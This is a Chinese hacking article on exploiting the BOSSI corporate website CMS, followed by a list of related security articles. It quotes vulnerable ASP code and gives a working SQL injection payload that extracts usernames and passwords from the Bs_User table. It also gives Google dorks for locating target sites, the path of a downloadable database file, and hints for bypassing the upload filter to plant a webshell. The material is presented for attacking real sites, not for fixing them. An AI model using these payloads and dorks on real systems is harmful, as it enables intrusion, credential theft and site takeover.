BOSSI 公司企业网站管理系统注入&上传漏洞利用
----------------------------------------------------
漏洞一:注入漏洞,
漏洞页面:NewsInfo.asp,
漏洞代码:if not isEmpty(request.QueryString("id")) then
id=request.QueryString("id")
else
id=1
end if
Set rs = Server.CreateObject("ADODB.Recordset")
rs.Open "Select * From Conews where id="&id, conn,3,3
'纪录访问次数
rs("counter")=rs("counter")+1
rs.update
nCounter=rs("counter")
id变量未处理直接代入sql查询,可注射,用啊d就行
页面二:yeNewsInfo.asp
漏洞代码:<%
if not isEmpty(request.QueryString("id")) then
id=request.QueryString("id")
else
id=1
end if
Set rs = Server.CreateObject("ADODB.Recordset")
rs.Open "Select * From Yenews where id="&id, conn,3,3
'纪录访问次数
rs("counter")=rs("counter")+1
rs.update
nCounter=rs("counter")
'定义内容
content=ubbcode(rs("content"))
%>
原理同上,可注入。
漏洞二:数据库下载漏洞
数据库地址:Database/DataShop.mdb
为建立放下载表,可任意下载!
漏洞三:上传漏洞
漏洞页面:upfile.asp ,upfilea.asp
问题代码:fileExt=lcase(file.FileExt)
Forumupload=split(UpFileType,"|")
for i=0 to ubound(Forumupload)
if fileEXT=trim(Forumupload(i)) then
EnableUpload=true
exit for
end if
next
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
EnableUpload=false
end if
if EnableUpload=false then
msg="这种文件类型不允许上传!\n\n只允许上传这几种文件类型:" & UpFileType
founderr=true
end if
和那个良精的上传漏洞一样,不知道是谁抄谁的代码了!注册用户,本地上传php的大马或者加空格过滤上传asp大马,具体方法我就不说了,在浅析良精企业网站管理程序一文中提到过了!不再赘述!
漏洞利用:注入,Google:inurl:yeNewsInfo.asp?Id
注入语句:%20and%201=2%20union%20select%201,username,3,4,password%20from%20Bs_User

或者啊d:需要手动添加表段:Bs_User

数据库漏洞利用:
挖掘机:关键字:inurl:yeNewsInfo.asp?Id
后缀:Database/DataShop.mdb

关于上传漏洞的利用我就不演示了,可参照 浅析良精企业网站管理系统漏洞 一文。
相关文章
本文来介绍一下thinkphp官方修复的一个getshell漏洞,框架对控制器没有进行足够的检测导致的一处getshell,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随2018-12-12记 FineUI 官方论坛discuz所遭受的一次真实网络攻击
这篇文章主要介绍了记 FineUI 官方论坛discuz所遭受的一次真实网络攻击,需要的朋友可以参考下2018-11-30- 这篇文章主要介绍了Linux 下多种反弹 shell 方法,需要的朋友可以参考下2017-09-06
- 这篇文章主要为大家介绍了基于反射的XSS攻击,主要依靠站点服务端返回脚本,在客户端触发执行从而发起Web攻击,需要的朋友可以参考下2017-05-20
- 这篇文章主要介绍了SQL注入黑客防线网站实例分析,需要的朋友可以参考下2017-05-19
- 这里为大家分享一下sql注入的一些语句,很多情况下由于程序员的安全意识薄弱或基本功不足就容易导致sql注入安全问题,建议大家多看一下网上的安全文章,最好的防范就是先学2017-05-19
- 对于目前流行的sql注入,程序员在编写程序时,都普遍的加入防注入程序,有些防注入程序只要在我们提交一些非法的参数后,就会自动的记录下你的IP地址,提交的非法参数和动作等,2017-04-29
- 我们友情进行XSS检查,偶然跳出个小弹窗,其中我们总结了一些平时可能用到的XSS插入方式,方便我们以后进行快速检查,也提供了一定的思路,其中XSS有反射、存储、DOM这三类2016-12-27
- 这篇文章主要介绍了Python 爬虫使用动态切换ip防止封杀的相关资料,需要的朋友可以参考下2016-10-08
- 这篇文章主要介绍了使用爬虫采集网站时,解决被封IP的几种方法的相关资料,需要的朋友可以参考下2016-10-08



最新评论